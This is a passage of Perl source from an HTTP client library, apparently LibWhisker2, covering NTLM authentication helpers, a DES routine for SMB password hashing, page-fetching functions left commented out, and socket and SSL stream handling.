' . ntlm_client( $ntlmobj, $found );\n    push @{ $hi->{whisker}->{header_delete_on_success} }, $header;\n    return 0;\n}\n\nsub _ntlm_auth_proxy_callback {\n    return _ntlm_auth_callback( $_[0], $_[1], $_[2], 1 );\n}\n\n########################################################################\n\n{    # start of DES local container #######################################\n    my $generated = 0;\n    my $perm1     = [\n        57, 49, 41, 33, 25, 17, 9,  1,  58, 50, 42, 34, 26, 18,\n        10, 2,  59, 51, 43, 35, 27, 19, 11, 3,  60, 52, 44, 36,\n        63, 55, 47, 39, 31, 23, 15, 7,  62, 54, 46, 38, 30, 22,\n        14, 6,  61, 53, 45, 37, 29, 21, 13, 5,  28, 20, 12, 4\n    ];\n    my $perm2 = [\n        14, 17, 11, 24, 1,  5,  3,  28, 15, 6,  21, 10, 23, 19, 12, 4,\n        26, 8,  16, 7,  27, 20, 13, 2,  41, 52, 31, 37, 47, 55, 30, 40,\n        51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32\n    ];\n    my $perm3 = [\n        58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4,\n        62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8,\n        57, 49, 41, 33, 25, 17, 9,  1, 59, 51, 43, 35, 27, 19, 11, 3,\n        61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7\n    ];\n    my $perm4 = [\n        32, 1,  2,  3,  4,  5,  4,  5,  6,  7,  8,  9,  8,  9,  10, 11,\n        12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21,\n        22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1\n    ];\n    my $perm5 = [\n        16, 7, 20, 21, 29, 12, 28, 17, 1,  15, 23, 26, 5,  18, 31, 10,\n        2,  8, 24, 14, 32, 27, 3,  9,  19, 13, 30, 6,  22, 11, 4,  25\n    ];\n    my $perm6 = [\n        40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31,\n        38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,\n        36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27,\n        34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9,  49, 17, 57, 25\n    ];\n    my $sc = [ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ];\n\n    sub des_E_P16 {\n        my ($p14) = @_;\n        my $sp8 = [ 0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25 ];\n        my $p7 = substr( $p14, 0, 7 );\n        my $p16 = des_smbhash( $sp8, $p7 );\n        $p7 = substr( $p14, 7, 7 );\n        $p16 .= des_smbhash( $sp8, $p7 );\n        return $p16;\n    }\n\n    sub des_E_P24 {\n        my ( $p21, $c8_str ) = @_;\n        my @c8 = map { ord($_) } split( //, $c8_str );\n        my $p24 = des_smbhash( \\@c8, substr( $p21, 0, 7 ) );\n        $p24 .= des_smbhash( \\@c8, substr( $p21, 7,  7 ) );\n        $p24 .= des_smbhash( \\@c8, substr( $p21, 14, 7 ) );\n    }\n\n    sub des_permute {\n        my ( $i, $out, $in, $p, $n ) = ( 0, @_ );\n        foreach $i ( 0 .. ( $n - 1 ) ) {\n            $out->[$i] = $in->[ $p->[$i] - 1 ];\n        }\n    }\n\n    sub des_lshift {\n        my ( $c, $d, $count ) = @_;\n        my ( @outc, @outd, $i, $x );\n        while ( $count-- ) {\n            push @$c, shift @$c;\n            push @$d, shift @$d;\n        }\n    }\n\n    my %dohash_cache;    # cache for key data; saves some cycles\n    my %key_cache;       # another cache for key data\n\n    sub des_cache_reset {\n        %dohash_cache = ();\n        %key_cache    = ();\n    }\n\n    sub des_dohash {\n        my ( $out, $in, $key ) = @_;\n        my ( $i, $j, $k, @pk1, @c, @d, @cd, @ki, @pd1, @l, @r, @rl );\n\n        # if(!defined $dohash_cache{$skey}){\n        &des_permute( \\@pk1, $key, $perm1, 56 );\n\n        for ( $i = 0 ; $i < 28 ; $i++ ) {\n            $c[$i] = $pk1[$i];\n            $d[$i] = $pk1[ $i + 28 ];\n        }\n        for ( $i = 0 ; $i < 16 ; $i++ ) {\n            my @array;\n            &des_lshift( \\@c, \\@d, $sc->[$i] );\n            @cd = ( @c, @d );\n            &des_permute( \\@array, \\@cd, $perm2, 48 );\n            $ki[$i] = \\@array;\n\n            #    $dohash_cache{$skey}->[$i]=\\@array;\n        }\n\n        # } else {\n        #\tfor($i=0;$i<16;$i++){\n        #\t\t$ki[$i]=$dohash_cache{$skey}->[$i];}\n        # }\n\n        des_dohash2( $in, \\@l, \\@r, \\@ki );\n\n        @rl = ( @r, @l );\n        &des_permute( $out, \\@rl, $perm6, 64 );\n    }\n\n    sub des_str_to_key {\n        my ($str) = @_;\n        my ( $i, @key, $out, @str );\n        unshift( @str, ord($_) ) while ( $_ = chop($str) );\n        $key[0] = $str[0] >> 1;\n        $key[1] = ( ( $str[0] & 0x01 ) << 6 ) | ( $str[1] >> 2 );\n        $key[2] = ( ( $str[1] & 0x03 ) << 5 ) | ( $str[2] >> 3 );\n        $key[3] = ( ( $str[2] & 0x07 ) << 4 ) | ( $str[3] >> 4 );\n        $key[4] = ( ( $str[3] & 0x0f ) << 3 ) | ( $str[4] >> 5 );\n        $key[5] = ( ( $str[4] & 0x1f ) << 2 ) | ( $str[5] >> 6 );\n        $key[6] = ( ( $str[5] & 0x3f ) << 1 ) | ( $str[6] >> 7 );\n        $key[7] = $str[6] & 0x7f;\n        foreach $i ( 0 .. 7 ) {\n            $key[$i] = 0xff & ( $key[$i] << 1 );\n        }\n        @{ $key_cache{$str} } = @key;\n        return \\@key;\n    }\n\n    sub des_smbhash {\n        my ( $in, $key ) = @_;\n        my $key2;\n\n        &des_generate if ( !$generated );\n        if ( defined $key_cache{$key} ) {\n            $key2 = $key_cache{$key};\n        }\n        else { $key2 = &des_str_to_key($key); }\n\n        my ( $i, $div, $mod, @in, @outb, @inb, @keyb, @out );\n        foreach $i ( 0 .. 63 ) {\n            $div = int( $i / 8 );\n            $mod = $i % 8;\n            $inb[$i]  = ( $in->[$div] &   ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0;\n            $keyb[$i] = ( $key2->[$div] & ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0;\n            $outb[$i] = 0;\n        }\n        &des_dohash( \\@outb, \\@inb, \\@keyb );\n        foreach $i ( 0 .. 7 ) { $out[$i] = 0; }\n        foreach $i ( 0 .. 63 ) {\n            $out[ int( $i / 8 ) ] |= ( 1 << ( 7 - ( $i % 8 ) ) )\n              if ( $outb[$i] );\n        }\n        my $out = pack( \"C8\", @out );\n\n        return $out;\n    }\n\n    sub des_generate {    # really scary dragons here....this code is optimized\n                          # for speed, and not readability\n        my ( $i, $j );\n        my $code = <<EOT;\n{ my \\$sbox = [[\n[14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7],[0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8],\n[4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0],[15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13]\n],[\n[15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10],[3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5],\n[0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15],[13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9]\n],[\n[10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8],[13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1],\n[13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7],[1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12]\n],[\n[7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15],[13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9],\n[10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4],[3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14]\n],[\n[2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9],[14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6],\n[4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14],[11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3]\n],[\n[12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11],[10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8],\n[9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6],[4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13]\n],[\n[4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1],[13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6],\n[1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2],[6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12]\n],[\n[13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7],[1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2],\n[7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8],[2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11]\n]];\nEOT\n\n        $code .=\n          'sub des_dohash2 { my ($in,$l,$r,$ki)=@_; my (@p,$i,$j,$k,$m,$n);';\n        for ( $i = 0 ; $i < 64 ; $i++ ) {\n            $code .= \"\\$p[$i] = \\$in->[\" . ( $perm3->[$i] - 1 ) . \"];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$l->[$i]=\\$p[$i]; \\$r->[$i]=\\$p[\" . ( $i + 32 ) . \"];\\n\";\n        }\n        $code .= 'for($i=0;$i<16;$i++){ local (@er,@erk,@b,@cb,@pcb,@r2);';\n        for ( $i = 0 ; $i < 48 ; $i++ ) {\n            $code .=\n                \"\\$erk[$i]=\\$r->[\"\n              . ( $perm4->[$i] - 1 )\n              . \"]^(\\$ki->[\\$i]->[$i]);\\n\";\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            for ( $j = 0 ; $j < 6 ; $j++ ) {\n                $code .= \"\\$b[$i][$j]=\\$erk[\" . ( $i * 6 + $j ) . \"];\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            $code .= \"\\$m=(\\$b[$i][0]<<1)|\\$b[$i][5];\\n\";\n            $code .=\n\"\\$n=(\\$b[$i][1]<<3)|(\\$b[$i][2]<<2)|(\\$b[$i][3]<<1)|\\$b[$i][4];\\n\";\n            for ( $j = 0 ; $j < 4 ; $j++ ) {\n                $code .=\n                    \"\\$b[$i][$j]=(\\$sbox->[$i][\\$m][\\$n]&\"\n                  . ( 1 << ( 3 - $j ) )\n                  . \")?1:0;\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            for ( $j = 0 ; $j < 4 ; $j++ ) {\n                $code .= \"\\$cb[\" . ( $i * 4 + $j ) . \"]=\\$b[$i][$j];\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$pcb[$i]=\\$cb[\" . ( $perm5->[$i] - 1 ) . \"];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$r2[$i]=(\\$l->[$i])^\\$pcb[$i];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$l->[$i]=\\$r->[$i]; \\$r->[$i]=\\$r2[$i];\\n\";\n        }\n        $code .= '}}}';\n\n        eval \"$code\";\n        #print \"DEBUG: $code\\n\\n\";\n        $generated++;\n    }\n\n}    ##### end of DES container ################################################\n\n\n########################################################################\n\n=item B<get_page>\n\nParams: $url [, \\%request]\n\nReturn: $code, $data ($code will be set to undef on error, $data will\n\t\t\tcontain error message)\n\nThis function will fetch the page at the given URL, and return the HTTP response code\nand page contents.  Use this in the form of:\n($code,$html)=LW2::get_page(\"http://host.com/page.html\")\n\nThe optional %request will be used if supplied.  This allows you to set\nheaders and other parameters.\n\n=cut\n\n# sub get_page {\n#     my ( $URL, $hr ) = ( shift, shift );\n#     return ( undef, 'No URL supplied' ) if ( length($URL) == 0 );\n\n#     my ( %req, %resp );\n#     my $rptr;\n\n#     if ( defined $hr && ref($hr) ) {\n#         $rptr = $hr;\n#     }\n#     else {\n#         $rptr = \\%req;\n#         http_init_request( \\%req );\n#     }\n\n#     my @u = uri_split( $URL, $rptr );\n#     return ( undef, 'Non-HTTP URL supplied' )\n#       if ( $u[1] ne 'http' && $u[1] ne 'https' );\n#     http_fixup_request($rptr);\n\n#     if ( http_do_request( $rptr, \\%resp ) ) {\n#         return ( undef, $resp{'whisker'}->{'error'} );\n#     }\n#     return ( $resp{'whisker'}->{'code'}, $resp{'whisker'}->{'data'} );\n# }\n\n########################################################################\n\n=item B<get_page_hash>\n\nParams: $url [, \\%request]\n\nReturn: $hash_ref (undef on no URL)\n\nThis function will fetch the page at the given URL, and return the whisker\nHTTP response hash.  The return code of the function is set to\n$hash_ref->{whisker}->{get_page_hash}, and uses the http_do_request()\nreturn values.\n\nNote: undef is returned if no URL is supplied\n\n=cut\n\n# sub get_page_hash {\n#     my ( $URL, $hr ) = ( shift, shift );\n#     return undef if ( length($URL) == 0 );\n\n#     my ( %req, %resp );\n#     my $rptr;\n\n#     if ( defined $hr && ref($hr) ) {\n#         $rptr = $hr;\n#     }\n#     else {\n#         $rptr = \\%req;\n#         http_init_request( \\%req );\n#     }\n\n#     my @u = uri_split( $URL, $rptr );    # this is newer >=1.1 syntax\n#     return undef if ( $u[1] ne 'http' && $u[1] ne 'https' );\n#     http_fixup_request($rptr);\n\n#     my $r = http_do_request( $rptr, \\%resp );\n#     $resp{whisker}->{get_page_hash} = $r;\n#     return \\%resp;\n# }\n\n########################################################################\n\n=item B<get_page_to_file>\n\nParams: $url, $filepath [, \\%request]\n\nReturn: $code ($code will be set to undef on error)\n\nThis function will fetch the page at the given URL, place the resulting HTML\nin the file specified, and return the HTTP response code.  The optional\n%request hash sets the default parameters to be used in the request.\n\nNOTE: libwhisker does not do any file checking; libwhisker will open the\nsupplied filepath for writing, overwriting any previously-existing files.\nLibwhisker does not differentiate between a bad request, and a bad file\nopen.  If you're having troubles making this function work, make sure\nthat your $filepath is legal and valid, and that you have appropriate\nwrite permissions to create/overwrite that file.\n\n=cut\n\n# sub get_page_to_file {\n#     my ( $URL, $filepath, $hr ) = @_;\n\n#     return undef if ( length($URL) == 0 );\n#     return undef if ( length($filepath) == 0 );\n\n#     my ( %req, %resp );\n#     my $rptr;\n\n#     if ( defined $hr && ref($hr) ) {\n#         $rptr = $hr;\n#     }\n#     else {\n#         $rptr = \\%req;\n#         http_init_request( \\%req );\n#     }\n\n#     my @u = uri_split( $URL, $rptr );    # this is newer >=1.1 syntax\n#     return undef if ( $u[1] ne 'http' && $u[1] ne 'https' );\n#     http_fixup_request($rptr);\n#     return undef if ( http_do_request( $rptr, \\%resp ) );\n\n#     open( OUT, \">$filepath\" ) || return undef;\n#     binmode(OUT);                        # stupid Windows\n#     print OUT $resp{'whisker'}->{'data'};\n#     close(OUT);\n\n#     return $resp{'whisker'}->{'code'};\n# }\n\n\n@_stream_FUNCS = (\n    [ 'open', 'close', 'read', 'write', 'writedone', 'valid' ],    # stream_NULL\n    [ 'socket', 'all', 'socket', 'socket', 'noop', 'socket' ]\n    ,    # stream_SOCKTCP   1\n    [ 'socket', 'all', 'socket', 'socket', 'noop', 'never' ]\n    ,    # stream_SOCKUDP   2\n    [ 'file', 'all', 'socket', 'file', 'noop', 'never' ],   # stream_FILE      3\n    [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'netssleay' ],    # stream_NETSSLEAY 4\n    [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'never' ],        # stream_NETSSL    5\n    [ 'buffer', 'buffer', 'buffer', 'buffer', 'noop',\n        'never' ]                                           # stream_BUFFER    6\n);\n\nsub stream_key {\n    my ( $key, $type, $wh ) = ( '', 1, shift );\n\n    if ( defined $wh->{whisker}->{UDP} && $wh->{whisker}->{UDP} > 0 ) {\n        $type = 2;\n        $key  = 'udp:';\n    }\n\n    if ( $wh->{whisker}->{ssl} > 0 ) {\n        $type = 4 if ( $LW_SSL_LIB == 1 );\n        $type = 5 if ( $LW_SSL_LIB == 2 );\n        $key = 'ssl:';\n    }\n\n    if ( defined $wh->{whisker}->{file_stream} ) {\n        $type = 3;\n        $key  = 'file=' . $wh->{whisker}->{file_stream} . ':';\n    }\n\n    if ( defined $wh->{whisker}->{buffer_stream} ) {\n        $type = 6;\n        $key  = 'buffer:';\n    }\n\n    my ( $x, $h, $p ) = (0);\n    if ( defined $wh->{whisker}->{proxy_host} ) {\n        $h = $wh->{whisker}->{proxy_host};\n        $p = $wh->{whisker}->{proxy_port} || 80;\n        $x++;\n        $key .= 'proxy:';\n        if ( $type == 5 ) {\n            $x                = 0;\n            $ENV{HTTPS_PROXY} = \"$h:$p\";\n            $h                = $wh->{whisker}->{host};\n            $p                = $wh->{whisker}->{port};\n        }\n    }\n    else {\n        $h = $wh->{whisker}->{host};\n        $p = $wh->{whisker}->{port};\n    }\n\n    $key .= $h . ':' . $p;\n    if ( defined $wh->{whisker}->{stream_num} ) {\n        $key .= '/' . $wh->{whisker}->{stream_num};\n    }\n\n    return $key if ( !wantarray() );\n    \n    if ($h =~ /:/) { # IPv6 address\n        $h =~ s/[\\[\\]]//g;\n    }    \n    \n    return ( $type, $h, $p, $x, $key );\n}\n\n# sub stream_setsock {\n#     my $fd = shift;\n#     my $wh = http_new_request( host => 'localhost', port => 80, ssl => 0 );\n#     my $xr = stream_new($wh);\n#     return undef if ( $xr->{streamtype} != 1 );\n#     $xr->{sock}  = $fd;\n#     $xr->{state} = 1  ;\n#     $xr->{eof}   = 0;\n#     $xr->{clearall}->();\n#     return $xr;\n# }\n\n{\n    $SYMCOUNT = 0;\n\n    sub stream_new {\n        my ( $c, $rh ) = ( 0, shift );\n        my $sock = _stream_newsock();\n        my %x;\n        %x = (\n            bufin      => '',\n            bufout     => '',\n            error      => '',\n            streamtype => 0,\n            eof        => 0,\n            ctx        => undef,\n            sock       => $sock,\n            state      => 0,\n            syns       => 0,\n            reqs       => 0,\n            timeout    => $rh->{whisker}->{timeout} || 10,\n            nonblock   => 0,\n            forceclose => 0\n        );\n\n        ( $x{streamtype}, $x{chost}, $x{cport}, $x{proxy}, $x{key} ) =\n          stream_key($rh);\n        return undef if ( $x{streamtype} == 0 );\n        return undef\n          if (\n            $LW_SSL_LIB == 0\n            && (   $x{streamtype} == 4\n                || $x{streamtype} == 5 )\n          );\n        return undef\n          if ( $x{streamtype} != 3\n            && $x{streamtype} != 6\n            && !defined $Socket::VERSION );\n\n        if ( $LW2_CAN_IPv6 ) { # set up any hints for getaddrinfo()\n            # If chost is an IP address, only try\n            # to create sockets of that address family\n            # and don't try to resolve it like a hostname.\n            if ( $x{chost} =~ /^$IPv4_re$/ ) {\n                $x{sock_hints}{family} = AF_INET;\n                $x{sock_hints}{flags} += AI_NUMERICHOST;\n            } elsif ( $x{chost} =~ /^$IPv6_re(?:[%][0-9a-z]+)?$/ ) {\n                $x{sock_hints}{family} = AF_INET6;\n                $x{sock_hints}{flags} += AI_NUMERICHOST;\n            }\n            \n            $x{sock_hints}{socktype} = ( $x{streamtype} == 2) ? SOCK_DGRAM : SOCK_STREAM ;\n        }\n            \n        $x{nonblock} = $LW_NONBLOCK_CONNECT if ( $x{streamtype} == 1 );\n        $x{forceclose} = 1 if ( $x{streamtype} == 5 );\n\n        $x{slurp} = $rh->{whisker}->{trailing_slurp} || 0;\n\n        my @N = @{ $_stream_FUNCS[ $x{streamtype} ] };\n        for ( $c = 0 ; $c < 6 ; $c++ ) {\n            my $n = $_stream_FUNCS[0]->[$c];\n            my $e =\n              '$x{\"' . $n . '\"}=sub{&_stream_' . $N[$c] . \"_$n\" . '(\\%x,@_)}';\n            eval \"$e\";\n        }\n        $x{queue} = sub { $x{bufout} .= shift };\n        $x{clearall} = sub { $x{bufin} = $x{bufout} = '' };\n        $x{clear} = sub { $x{bufout} = '' };\n        return bless \\%x, 'LW2::stream';\n    }\n\n    sub _stream_newsock {    # same as Symbol::gensym\n        my $pkg  = \"LW2::\";\n        my $name = \"_STREAM_\" . $SYMCOUNT++;\n        delete $$pkg{$name};\n        return \\*{ $pkg . $name };\n    }\n}\n\nsub _stream_all_close {\n    my $xr = shift;\n    $xr->{state} = 0;\n    if ( $xr->{streamtype} == 4 ) {\n        eval { $xr->{sock}->shutdown() };\n        eval { close( $xr->{origsock} ) };\n\n        #\t\teval { Net::SSLeay::free($xr->{sock}) };\n    }\n    else {\n        eval { close( $xr->{sock} ) };\n    }\n}\n\nsub _stream_never_valid {\n    return 0;\n}\n\nsub __bad_netssleay_error {\n    my $err = Net::SSLeay::ERR_get_error;\n    return 0\n      if ( $err == Net::SSLeay::ERROR_NONE\n        || $err == Net::SSLeay::ERROR_WANT_READ\n        || $err == Net::SSLeay::ERROR_WANT_WRITE );\n    return 1;\n}\n\nsub _stream_netssleay_valid {\n    my $xr = shift;\n    return 0 if ( $LW_SSL_KEEPALIVE == 0 || $xr->{state} == 0 );\n    return 0 if ( &Net::SSLeay::OPENSSL_VERSION_NUMBER < 0x0090601f );\n\n    my $lo = Net::SSLeay::pending( $xr->{sock} );\n    if ( $lo > 0 ) {    # leftover data to slurp\n        if ( !$xr->{slurp} ) {\n            return 0 if ( !_stream_ssl_read($xr) );\n        }\n        else {\n\n            # todo\n            #$xr->{slurped}.=$x.\"\\0\";\n        }\n    }\n    return 0 if ( __bad_netssleay_error() );\n\n    my ( $r, $e, $vin ) = ( undef, undef, '' );\n    my $fno = fileno( $xr->{origsock} );\n    vec( $vin, $fno, 1 ) = 1;\n    if ( select( ( $r = $vin ), undef, ( $e = $vin ), .0001 ) ) {\n        return 0 if ( vec( $e, $fno, 1 ) );\n        if ( vec( $r, $fno, 1 ) ) {    # waiting data, let's peek\n            my $temp = Net::SSLeay::peek( $xr->{sock}, 1 );\n            return 0 if ( __bad_netssleay_error() );\n            return 0 if ( $temp <= 0 );\n        }\n    }\n\n    return 1;\n}\n\nsub _stream_socket_valid {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    my ( $o, $vin ) = ( undef, '' );\n    vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n    if ( select( ( $o = $vin ), undef, undef, .0001 ) ) {\n        my ( $hold, $res );\n        do {\n            $res = sysread( $xr->{sock}, $hold, 4096 );\n            return _stream_err( $xr, 1, 'is_valid sysread failed' )\n              if ( !defined $res );    # error\n            return 0 if ( $res == 0 ); # EOF\n            if ( !$xr->{slurp} ) {\n                $xr->{bufin} .= $hold;\n            }\n            else {\n                $xr->{slurped} .= $hold . \"\\0\";\n            }\n        } while ( $res && select( ( $o = $vin ), undef, undef, .0001 ) );\n    }\n    return 1;\n}\n\nsub _stream_socket_read {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    my ( $vin, $t ) = ( '', '' );\n    vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n    return 0 if ( !select( $vin, undef, undef, $xr->{timeout} ) );\n    my $res = sysread( $xr->{sock}, $t, 4096 );\n    return _stream_err( $xr, 1, 'sysread failed' ) if ( !defined $res );\n    if ( $res == 0 ) {\n        $xr->{eof} = 1;\n        return 0;\n    }\n    $xr->{bufin} .= $t;\n    $xr->{eof} = 0;\n    return 1;\n}\n\nsub _stream_ssl_read {\n    my ( $xr, $t ) = ( shift, '' );\n    return 0 if ( $xr->{state} == 0 );\n    if ( $xr->{streamtype} == 4 ) {\n        local $SIG{ALRM} = sub { die \"lw_timeout\\n\" };\n        local $SIG{PIPE} = sub { die \"lw_pipe\\n\" };\n        eval {\n            eval { alarm( $xr->{timeout} ) };\n\n            #\t\t\tsleep(1) while(!Net::SSLeay::pending($xr->{sock}));\n            $t = Net::SSLeay::read( $xr->{sock} );\n            eval { alarm(0) };\n        };\n        return 0 if ( $@ || __bad_netssleay_error() || !defined $t || $t eq '' );\n    }\n    elsif ( $xr->{streamtype} == 5 ) {\n        return 0 if ( !$xr->{sock}->read( $t, 4096 ) );\n    }\n    $xr->{bufin} .= $t;\n    return 1;\n}\n\nsub _stream_noop_writedone { }\n\nsub _stream_ssl_writedone {\n    my $xr = shift;\n    if ( $xr->{streamtype} == 4 ) {    # Net::SSLeay\n        shutdown $xr->{origsock}, 1;\n    }\n    else {                             # Net::SSL\n                                       #shutdown $xr->{sock}, 1;\n    }\n}\n\nsub _stream_socket_write {\n    my ( $xr, $data, $v, $wrote ) = ( shift, shift, '', 0 );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    vec( $v, fileno( $xr->{sock} ), 1 ) = 1;\n    return _stream_err( $xr, 1, 'stream write test failed' )\n      if ( !select( undef, $v, undef, .0001 ) );\n    my $piperr = 0;\n    local $SIG{PIPE} = sub { $piperr++ };\n\n    #\t$wrote=syswrite($xr->{sock},$xr->{bufout},$len);\n    #\treturn _stream_err($xr,1,'syswrite failed')\n    #\t\tif(!defined $wrote || $piperr);\n    #\t$xr->{error} = 'could not send entire queue' && return 0\n    #\t\tif($wrote!=$len);\n    #\t$xr->{bufout}='';\n    #\treturn 1;\n\n    do {\n        $wrote = syswrite( $xr->{sock}, $xr->{bufout}, $len );\n        if ( defined $wrote ) {\n            substr( $xr->{bufout}, 0, $wrote ) = '';\n        }\n        else {\n            if ( $! != EWOULDBLOCK ) {\n                $piperr++;\n            }\n            else {\n                vec( $v, fileno( $xr->{sock} ), 1 ) = 1;\n                $piperr++ if ( !select( undef, $v, undef, $xr->{timeout} ) );\n            }\n        }\n        return _stream_err( $xr, 1, 'syswrite failed' ) if ($piperr);\n        $len = length( $xr->{bufout} );\n    } while ( $len > 0 );\n    return 1;\n}\n\nsub _stream_ssl_write {\n    my ( $xr, $data, $wrote, $err ) = ( shift, shift, 0, '' );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    if ( $xr->{streamtype} == 4 ) {\n        ( $wrote, $err ) =\n          Net::SSLeay::ssl_write_all( $xr->{sock}, \\$xr->{bufout} );\n        if ( __bad_netssleay_error() || !$wrote ) {\n            $xr->{error} = \"SSL error: $err\";\n            return 0;\n        }\n        if ( $wrote != $len ) {\n            $xr->{error} = 'could not send entire queue';\n            return 0;\n        }\n    }\n    elsif ( $xr->{streamtype} == 5 ) {\n        $xr->{sock}->print( $xr->{bufout} );\n\n        # bummer, no error checking?\n    }\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_socket_alloc {\n    my ( $xr, $wh ) = @_;\n\n    if ($LW2_CAN_IPv6) {\n        \n        my ($ip, $port);\n\n        $xr->{sock_hints}->{family} = ( $main::CLI{'ipv6'} ) ?  AF_INET6 :  AF_INET ;\n        \n        if ( defined $wh->{whisker}->{bind_socket} ) {\n            $port = $wh->{whisker}->{bind_port} || 0;\n            \n            $port = 0 if ( $port eq '*'); # most OS will find a spare port for us\n            \n            return _stream_err( $xr, 0, 'Bad bind_port value' ) if\n                ( $port !~ /^(?:[0-9]+)$/ );\n                \n            $ip = (defined $wh->{whisker}->{bind_addr}) ?\n                $wh->{whisker}->{bind_addr} :\n                INADDR_ANY ;\n            \n            $xr->{sock_hints}->{flags} += AI_PASSIVE;\n            \n        } else {\n            ($ip,$port) = ($xr->{chost}, $xr->{cport});\n        }\n        \n        my ($err, @results) = getaddrinfo($ip, $port, $xr->{sock_hints});\n        return _stream_err( $xr, 0, \"getaddrinfo problems ($err)\" ) if $err;\n        return _stream_err( $xr, 0, 'getaddrinfo problems (no sockets)' )\n          if ( scalar(@results) < 1);\n\n        # Ideally, we should call connect() on each @result\n        # but LW2 isn't currently set up to make that easy...\n        return _stream_err( $xr, 0, 'socket() problems' )\n          if (\n            !socket(\n                $xr->{sock}, $results[0]->{family},\n                $results[0]->{socktype}, $results[0]->{proto} || 0\n            )\n          );\n          \n        $xr->{iaton} = $results[0]->{addr};\n\n    } else {\n        if ( $xr->{streamtype} == 2 ) {\n            return _stream_err( $xr, 0, 'socket problems (UDP)' )\n              if (\n                !socket(\n                    $xr->{sock}, PF_INET,\n                    SOCK_DGRAM, getprotobyname('udp') || 0\n                )\n              );\n        }\n        else {\n            return _stream_err( $xr, 0, 'socket() problems' )\n                if (\n                  !socket(\n                      $xr->{sock}, PF_INET,\n                      SOCK_STREAM, getprotobyname('tcp') || 0\n                  )\n                );\n        }\n\n        if ( defined $wh->{whisker}->{bind_socket} ) {\n            my $p = $wh->{whisker}->{bind_port} || '*';\n            $p =~ tr/0-9*//cd;\n            return _stream_err( $xr, 0, 'Bad bind_port value' )\n              if ( $p eq '' );\n            my $a = INADDR_ANY;\n            $a = inet_aton( $wh->{whisker}->{bind_addr} )\n              if ( defined $wh->{whisker}->{bind_addr} );\n            return _stream_err( $xr, 0, 'Bad bind_addr value' )\n              if ( !defined $a );\n            if ( $p =~ tr/*// ) {\n                for ( $p = 14011 ; $p < 65535 ; $p++ ) {\n                    if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) ) {\n                        return _stream_err( $xr, 0, 'bind() on socket failed' )\n                          if ( $! ne 'Address already in use' );\n                    }\n                    else {\n                        last;\n                    }\n                }\n                return _stream_err( $xr, 0, 'bind() cannot find open socket' )\n                  if ( $p >= 65535 );\n            }\n            else {\n                return _stream_err( $xr, 0, 'bind() on socket 